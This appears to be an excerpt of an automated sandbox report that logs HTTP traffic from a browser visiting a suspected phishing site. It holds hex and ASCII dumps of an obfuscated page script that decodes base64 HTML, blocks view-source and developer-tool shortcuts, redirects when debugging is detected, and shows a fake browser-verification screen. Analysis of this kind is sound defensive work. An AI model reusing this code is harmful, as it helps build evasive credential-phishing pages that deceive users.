                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImxpYWV1eEdrM2QwVDJ4MGVhczgwWkE9PSIsInZhbHVlIjoiQityVU4ySkpoTHJQNmkrS1Uvb1pHd09yN2JjaGlvRmxreVkrYUVMQ0dQR3RzTTE3Z0oyNjdEWlQ2aUMzMmdUcWZYNms5ZXFzdGQwczJrL1hGdnpQanZrTmVDQVNDSGZBM1lVbTh4VHlIMVBCOTFXektQaXhFQ3FQdExXdEpRUFY
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 34 63 37 39 0d 0a 3c 21 2d 2d 20 44 6f 6e 26 23 30 33 39 3b 74 20 77 61 74 63 68 20 74 68 65 20 63 6c 6f 63 6b 3b 20 64 6f 20 77 68 61 74 20 69 74 20 64 6f 65 73 2e 20 4b 65 65 70 20 67 6f 69 6e 67 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 4e 57 55 49 75 65 48 4e 33 63 47 4a 7a 62 58 67 75 63 6e 55 76 4f 57 52 44 55 43 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a
                                                                                                                              Data Ascii: 4c79... Don&#039;t watch the clock; do what it does. Keep going. --><script>if(atob("aHR0cHM6Ly9NWUIueHN3cGJzbXgucnUvOWRDUC8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZ
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 31 51 6b 73 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 4d 78 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69
                                                                                                                              Data Ascii: 1QksuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTMxcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCi
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41
                                                                                                                              Data Ascii: dC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICA
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 4e 64 48 42 79 65 6b 39 7a 62 45 56 69 49 43 30 67 64 6c 5a 58 55 6b 68 48 56 55 39 44 63 79 41 2b 49 47 5a 74 51 6c 42 6f 56 48 68 46 57 47 34 67 4a 69 59 67 49 57 35 7a 53 6d 31 7a 59 33 4e 6c 52 30 45 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 35 7a 53 6d 31 7a 59 33 4e 6c 52 30 45 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 4a 32 68 30 64 48 42 7a 4f 69 38 76 64 33 64 33 4c 6d 39 75 5a 57 52 79 61 58 5a 6c 4c 6d 4e 76 62 53 63 70 4f 77 30 4b 49 43 41 67
                                                                                                                              Data Ascii: D0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChNdHByek9zbEViIC0gdlZXUkhHVU9DcyA+IGZtQlBoVHhFWG4gJiYgIW5zSm1zY3NlR0EpIHsNCiAgICAgICAgICAgIG5zSm1zY3NlR0EgPSB0cnVlOw0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vd3d3Lm9uZWRyaXZlLmNvbScpOw0KICAg
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 51 57 31 52 5a 30 74 50 57 6d 6c 68 54 69 49 2b 44 51 70 57 5a 58 4a 70 5a 6e 6c 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 49 48 52 76 49 47 56 75 63 33 56 79 5a 53 42 68 49 48 4e 6c 59 33 56 79 5a 53 42 76 62 6d 78 70 62 6d 55 67 5a 58 68 77 5a 58 4a 70 5a 57 35 6a 5a 53 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 48 4e 6a 63 6d 6c 77 64 44 34 4e 43 6e 52 31 63 6d 35 7a 64 47 6c 73 5a 53 35 79 5a 57 35 6b 5a 58 49 6f 4a 79 4e 6a 5a 69 63 73 49 48 73 4e 43 69 41 67 49 43 42 7a 61 58 52 6c 61 32 56 35 4f 69 41 6e 4d 48 67 30 51 55 46 42 51 55 46 42 51 54 42 78 63
                                                                                                                              Data Ascii: VudGVyIiBpZD0iQW1RZ0tPWmlhTiI+DQpWZXJpZnlpbmcgeW91ciBicm93c2VyIHRvIGVuc3VyZSBhIHNlY3VyZSBvbmxpbmUgZXhwZXJpZW5jZS4NCjwvZGl2Pg0KPC9mb3JtPg0KPC9kaXY+DQo8L2Rpdj4NCjwvZGl2Pg0KPHNjcmlwdD4NCnR1cm5zdGlsZS5yZW5kZXIoJyNjZicsIHsNCiAgICBzaXRla2V5OiAnMHg0QUFBQUFBQTBxc
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 57 78 76 59 57 51 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 51 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 5a 58 4a 79 62 33 49 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d
                                                                                                                              Data Ascii: gICAgICAgcmV0dXJuIHJlc3BvbnNlLmpzb24oKTsNCiAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KICAgICAgICBsb2NhdGlvbi5yZWxvYWQoKTsNCiAgICAgICAgfQ0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnZXJyb3InKXsNCiAgICAgICAgd2luZG93Lm
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 46 71 70 56 49 49 67 6d 56 73 20 3d 20 44 6b 6c 68 4b 48 58 4e 46 6f 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 46 71 70 56 49 49 67 6d 56 73 20 3d 3d 20 48 65 58 65 42 79 77 61 54 47 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31
                                                                                                                              Data Ascii: ice(0, -1);}const FqpVIIgmVs = DklhKHXNFo.pathname+'/';if(FqpVIIgmVs == HeXeBywaTG){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 4d 78 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69 4e 6c 52 6e 4e 49 64 48 56 69 64 55 4a 4c 49 43 35 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 42 37 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 6f 67 59 32 56 75 64 47 56 79 49 57 6c 74 63
                                                                                                                              Data Ascii: MxcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNlRnNIdHVidUJLIC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltc
                                                                                                                              2024-12-04 20:15:57 UTC1369INData Raw: 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55
                                                                                                                              Data Ascii: gfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleU


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.449749104.17.25.144433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:15:59 UTC649OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://h6n.xswpbsmx.ru/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:15:59 UTC958INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:15:59 GMT
                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                              ETag: W/"61182885-40eb"
                                                                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              Timing-Allow-Origin: *
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 541736
                                                                                                                              Expires: Mon, 24 Nov 2025 20:15:59 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WGIPH%2FPhCB%2BSao7OJei76GsVRtTez3qqU0err9WZh2OVufy4ZZbGgAJk7j33VybOFCqqezmPQ8OdsS87dQUeCRjb9ms1jRC6iSc02JgJl4CTxGDKtqAlsgUE5lqXQVgmTs%2ByCv39"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78beed7f5e60-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:15:59 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                              Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                                                                                              Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                                                                                              Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
                                                                                                                              Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                                                                                              Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                                                                                              Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                                                                                              2024-12-04 20:15:59 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
